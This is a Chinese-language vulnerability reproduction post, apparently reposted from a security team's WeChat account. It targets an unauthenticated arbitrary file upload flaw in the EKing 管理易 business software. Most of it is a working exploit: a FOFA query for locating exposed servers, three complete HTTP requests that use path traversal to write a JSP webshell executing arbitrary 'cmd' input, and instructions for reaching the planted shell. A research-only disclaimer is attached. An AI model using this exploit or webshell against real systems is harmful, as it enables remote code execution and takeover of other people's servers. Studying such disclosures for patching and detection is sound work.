Eking管理易Html5Upload接口任意文件上传漏洞复现

admin
admin
admin
140350
文章
117
评论
2024年10月21日18:24:04评论50 views字数 2507阅读8分21秒阅读模式
东方隐侠团队

漏洞复现分析

 

CYBER SECURITY

 

01
漏洞介绍
Eking管理易管理软件

Html5Upload接口任意文件上传

Eking管理易Html5Upload接口任意文件上传漏洞复现
【产品介绍】

EKing-管理易是一款专为广告制品制作企业量身定制的管理软件产品,由广州易凯软件技术有限公司开发,管理易基于久经考验的JAVA企业版技术研发,汇聚了数百家行业用户的管理精髓,旨在帮助广告装饰、有机工艺、展览展示、有机丝印、喷绘写真等广告标识制作企业实现规范化、科学化管理,提升运营效率,降低运营成本。

【漏洞介绍】

eking管理易Html5Upload接口存在任意文件上传漏洞,未经身份验证的远程攻击者可利用此漏洞上传任意文件,在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

网络安全
共筑防线
Eking管理易Html5Upload接口任意文件上传漏洞复现
Eking管理易Html5Upload接口任意文件上传漏洞复现
02
漏洞复现
分析、复现
Eking管理易Html5Upload接口任意文件上传漏洞复现
【FOFA】

    app="EKing-管理易"

Eking管理易Html5Upload接口任意文件上传漏洞复现

【漏洞复现】

1. 定义一个临时的文件命名为../../yxnb.jsp.

POST /Html5Upload.ihtm HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 84

comm_type=INIT&sign_id=shell&vp_type=default&file_name=../../yxnb.jsp&file_size=2048

Eking管理易Html5Upload接口任意文件上传漏洞复现

2. 上传文件内容

POST /Html5Upload.ihtm HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 801

------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition
: form-data; name="comm_type"

DATA
------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="sign_id"

shell
------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="data_inde"

0
------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="data"; filename="chunk1"
Content-Type: application/octet-stream

<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundaryj7OlOPiiukkdktZR--

Eking管理易Html5Upload接口任意文件上传漏洞复现

3. 最终保存文件

POST /Html5Upload.ihtm HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 52

comm_type=END&sign_id=shell&file_name=../../yxnb.jsp

Eking管理易Html5Upload接口任意文件上传漏洞复现

4. 此时访问 http

展开收缩
://xxx/yxnb.jsp 即可访问上传的webshell

 

原文始发于微信公众号(东方隐侠安全团队):漏洞复现|Eking管理易Html5Upload接口任意文件上传漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月21日18:24:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Eking管理易Html5Upload接口任意文件上传漏洞复现https://cn-sec.com/archives/3293147.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息